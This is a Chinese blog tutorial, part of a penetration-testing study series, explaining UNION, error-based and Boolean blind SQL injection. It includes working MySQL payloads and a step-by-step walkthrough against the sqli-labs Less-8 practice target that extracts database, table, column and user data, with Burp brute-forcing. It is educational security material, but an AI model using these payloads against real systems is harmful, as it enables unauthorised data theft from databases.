渗透测试学习篇(SQL注入漏洞2)

最新推荐文章于 2024-09-01 23:06:50 发布
最新推荐文章于 2024-09-01 23:06:50 发布
阅读量1k 收藏 19
点赞数 37
分类专栏: 网络安全/渗透测试学习专区 文章标签: 学习 安全 web安全 网络安全 网络 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59518755/article/details/140930259
版权

今天继续和大家说一下在学习渗透测试时要学习的SQL注入漏洞的知识~~~

接着上次的继续和大家说

上次给大家说了简单的基础知识,以及如何判断注入点等等~~~

今天和大家分享详细的几种SQL注入漏洞的渗透方法和思路

一、union联合注入

这是一种简单的注入,实际工作中遇到的较少~~

Union 有一个十分严格的约束条件,因为是联合查询,必选保证字段数一致即两个查询结果有相同的列数

SELECT * FROM USERS WHERE ID=1 UNION 1,2,3,4,5

使用这种注入方法必定是有回显的,有很多靶场,大家可以看看,要加强练习~~~

二、报错注入

需要代码中有Mysqli_error()函数进行报错显示   重点,前提

1.常见的报错函数

updatexml()

floor()

exp()

linestring()

geometrycollection()

multipoint()

2.原理

xpath语法错误

BIGINT等数据类型溢出

count()+rand()+groupby() ·导致主键冲突·

简单来说就是有`XML路径` ,而在路径中,插入特殊字符是非法得,也就会产生报错,而当报错内容为SQL语句得时候,SQL那边得解析器会自动解析该SQL语句,就会造成SQL语句得执行,从而触发SQL注入。

3.使用方法

  • updatexml()

语法:updatexml(目标xml文档,xml路径(xpath),更新的内容)

语句:select updatexml(1,concat(0x7e,(select version())),1);

  • extractvalue()

语法:extractvalue(目标xml文档,xml路径)

语句:select extractvalue(1,concat('~',(select user())));

updatexml(目标文,xml文件路径,更新内容)

updatexml(1,select database(),1)

记得也得多练习靶场~~~

三、布尔盲注

查询数据不能回显到前端,但会显示正常和异常!!!

1.函数

  • ascii() / ord() 将某个字符串转化为ascii值

语句:select ascii(mid(user(),1));

  • Lenght() 返回字段/结果的长度

语法:select length(user())

  • count() 聚合函数也称作计数函数,返回查询对象的总数

语法:select count(*) from student;

  • substr() 此函数是用来截取字符串一部分。

语法:select substr(user(),1,2);

  • limit 限制查询数

limit 0,1 第一个数据

对应好了,大家可以参考这张表

因为盲注不太好理解,这里给大家举一个靶场的例子

(Less-8案例)

  1. 判断是否存在注入

页面会显示正常或异常

  1. 判断字段数量 (order by n )
  2. 判断回显位置(union )

PS:以上除了第一步,其他状态都不会在前端看出来!!!!!

下面为布尔盲注时的用法:

  1. 判断数据库名长度(二分法)

?id=1' and length(database())>10 --+(PS:这边都是用二分法猜个数,最后确定的)

  1. 判断数据库名称

?id=1' and ascii(substr(database(),1,1)) =115 --+(PS:只能猜测)

对数据库名进行截取,更换截取的位置来判断出每一位字母的ascii码(不过可以采用Burp爆破,抓包,更快捷)

Payload1有效载荷给定截取位置,Payload2有效载荷给定ascii范围

  1. 判断数据库里表的个数

?id=1' and (select count(table_name) from information_schema.tables where table_schema='security') =4 --+(PS:这边都是用二分法猜个数,最后确定的,下面的也都是如此,正常我们是不能知道个数和长度的)

  1. 获取到数据库名之后继续进行注入,分别注入出各个表名的长度

?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 0,1)) =6 --+(limit 0,1这里就举例一个表了)

  1. 查询表名

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117 --+ 结果为117,然后依次改变截断位置

Burp爆破后得出表名

通过排序解密表名

  1. 判断字段的个数

?id=1' and count((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1)) =3 --+

  1. 判断各个字段名长度

?id=1' and length((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1)) =3 --+

  1. 猜解字段名

?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 1,1),1,1)) =117 --+

知道了每个字段得长度,然后逐字猜解ASCII/字母即可

Burp爆破后得出字段名

  1. 获取字段下内容数量

?id=1' and (select count(username) from users limit 0,1)=12 --+

  1. 获取其中一个字段第一个内容长度

?id=1' and length((select username from users limit 0,1))=4 --+ #username字段下第一个内容长度为4

  1. 获取第一个字段内容

?id=1' and ascii(substr((select username from users limit 0,1),1,1))=68 --+ #内容ascii码为68 = D

通过Burp爆破获取

更改索引循环前面步骤即可得到其他内容ascii !!!!!

大家跟着做一遍应该就都懂了,亲手做过就会理解了~~~

今天就给大家介绍三种,后面的之后慢慢给大家介绍~

0xError
关注
  • 37
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记对一网站(存在SQL注入漏洞渗透测试过程
DXfighting_的博客
04-14 804
网站sql注入漏洞利用
渗透测试学习SQL注入漏洞
m0_59518755的博客
07-30 1095
渗透测试SQL注入漏洞的挖掘方法,基础知识,学习SQL注入
渗透测试SQL注入漏洞
sunnygao的博客
09-27 1878
文章目录SQL注入SQL盲注**时间盲注**联合盲注**获取数据库版本和当前操作系统****尝试获取pikachu数据库中的表名****根据经验猜测****尝试获取users表中的字段名**6.尝试获取用户名和密码sql注入步骤怎样防御SQL注入漏洞 SQL注入 ​ 字符型的注入(加单引号)和 数字型的注入 1' or 1=1# 查出所有数据。 SQL盲注 ​ 在服务器没有错误回显时完成注入攻击,服务器没有回显,对攻击者来说缺少了重要调试信息,所以攻击者必须找到一个方法验证注入的SQL语句是否被执行。 分
渗透测试——五、网站漏洞——SQL注入
热门推荐
钟言的博客
12-05 1万+
学习渗透测试第五课,网站漏洞SQL注入,详细内容如下:一、走进DVWA测试网站 1、网站渗透测试步骤 2、DVWA网站 3、其他漏洞网站 4、进入DVMA网站 二、暴力破解和SQL注入 1、暴力破解 2、SQL语句 3、PHP语言 4、暴力破解页面之Burp Suite破解 5、暴力破解页面之SQL注入 6、SQL注入页面之 SQL注入 7、SQL注入(盲注)页面之 SQL注人 8、SQL注入(盲注)页面之SQLMap 自动注入等等
web渗透测试----26、SQL注入漏洞--(1)原理
七天
08-26 5549
SQL注入漏洞
渗透学习—靶场—墨者学院—SQL注入漏洞测试(参数加密)
qq_43696276的博客
10-25 1878
这一关,难点主要在于需要我们判断参数后的加解密类型,从而引导我们去目录遍历,拿到对应的源码!!!然后呢,还需要我们能够对php代码进行审计,从而找出其参数的加密过程。。其中还有一个坑在于末尾要加上_mozhe总体而言,感觉难度还是稍有的(于我个人而言)
web渗透测试----26、SQL注入漏洞--(2)SQL注入漏洞的挖掘(白盒)
七天
09-06 1492
SQL注入漏洞白盒挖掘方法
SQL注入漏洞检测
Kali与编程
12-10 1350
SQL注入漏洞是一种常见的安全漏洞渗透测试工程师需要掌握SQL注入漏洞的检测技术,以便在测试中及时发现和利用漏洞。常见的注入点包括GET参数、POST参数、Cookie、HTTP头部信息和用户名密码等,常见的注入方式包括基于错误的注入、基于联合查询的注入、基于布尔盲注的注入、基于时间盲注的注入和基于报错盲注的注入等。本文将从渗透测试工程师的角度,详细介绍SQL注入漏洞的检测基础,包括常见的注入点、注入方式、手工注入和自动化注入等。常见的SQL注入技术包括基于错误的注入、基于时间的注入、联合查询注入等。
Web安全基础学习SQL注入漏洞之PostgreSql注入
qq_51862722的博客
06-18 1215
SQL注入(SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
渗透测试-SQL注入
weixin_53696027的博客
02-05 2463
sql注入渗透测试重要的一部分,如果服务器存在sql注入漏洞将面临严重的威胁
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
基于攻击反馈模型的SQL注入漏洞渗透测试方法.pdf
01-04
"基于攻击反馈模型的SQL注入漏洞渗透测试方法" 本文提出了一种基于攻击反馈模型的SQL注入漏洞渗透测试方法,该方法可以提高SQL注入漏洞渗透测试的准确度和效率。该方法基于攻击反馈模型,通过梳理SQL注入攻击逻辑和...
通达OA sql注入漏洞.zip
08-24
然而,就像许多其他复杂的软件系统一样,它可能存在安全漏洞,其中之一就是SQL注入漏洞SQL注入网络安全中的一个常见问题,允许攻击者通过在输入字段中插入恶意SQL代码来操纵数据库,获取敏感信息,甚至完全控制...
学习笔记】卫星通信NTN 3GPP标准化进展分析(六)- 参考标准
最新发布
u011376987的博客
09-01 991
本文总结了NTN标准化进程以及后续的研究计划,是学习NTN协议的入门。本文来自3GPP Joern Krause, 3GPP MCC。
MySQL基础学习
eugene03的博客
08-29 2246
事务是一组操作的集合,它是一个不可分割的工作单位,事务会把所有操作作为一个整体一起向系统提交或者撤掉操作请求,那么这些操作要么同时成功,要么同时失败。笛卡尔积:两个集合 A集合和B集合的所有组合情况(在多表查询时,需要消除无效的笛卡尔积)对于union 查询,就是把多次查询的结果合并起来,行程一个新的查询结果集。相当于查询表1(左表)的所有数据包含表1和表2交集部分的数据。相当于查询表2(右表)的所有数据包含表1和表2交集部分的数据。自连接查询,可以是内连接查询,也可以是外连接查询。
AI实践与学习8-AI Agent Workflow助力解题和验证答案置信度
xiaosi的博客
08-30 738
之前在试着提高解题正确率,目标100%,发现外部知识不足仅依靠大模型的话比较困难。而试题人工生产成本巨大。本质因为大模型生成内容会有幻觉特点,也就是说解答的试题正确性不太好评判,直接解答试题生产场景不太可控。后面考虑调用OpenAI解题的时候,像xxx那样通过输出置信度来帮助判断答案的正确性 or 其他形式只要能保证LLM生成答案是可靠(程序判断)的。
算法的学习笔记—把数字翻译成字符串
业精于勤,荒于嬉
08-31 882
通过动态规划的方法,我们可以高效地计算出一个数字字符串有多少种不同的翻译方法。这个问题不仅考察了我们对动态规划的理解,还让我们熟悉了如何处理字符串中的边界情况和状态转移。希望通过这个例子的讲解,能够帮助你更好地理解动态规划的应用。😁热门专栏推荐想学习vue的可以看看这个java基础合集数据库合集redis合集nginx合集linux合集手写机制微服务组件spring_尘觉springMVCmybit欢迎大家加入我的社区尘觉社区文章到这里就结束了,如果有什么疑问的地方请指出,诸佬们一起来评论区一起讨论
网络编程学习:TCP/IP协议
kkbbaaii的博客
09-01 1203
网络编程学习:TCP/IP协议
html+css+js网页设计 个人博客模版 我的学习经历7个页面
qq_42431718的博客
08-28 1325
html+css+js网页设计 个人博客模版 我的学习经历7个页面 网页作品代码简单,可使用任意HTML编辑软件(如:Dreamweaver、HBuilder、Vscode 、Sublime 、Webstorm、Text 、Notepad++ 等任意html编辑软件进行运行及修改编辑等操作)。
萨迪科技渗透测试SQL注入漏洞获取Flag
"这文档是关于对萨迪科技进行的渗透测试案例,主要涉及网络安全领域,特别是SQL注入漏洞的利用。测试过程中,通过Nmap扫描目标IP,发现开放的80端口,并利用SQL注入漏洞获取数据库中的敏感信息,最终找到并提取了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值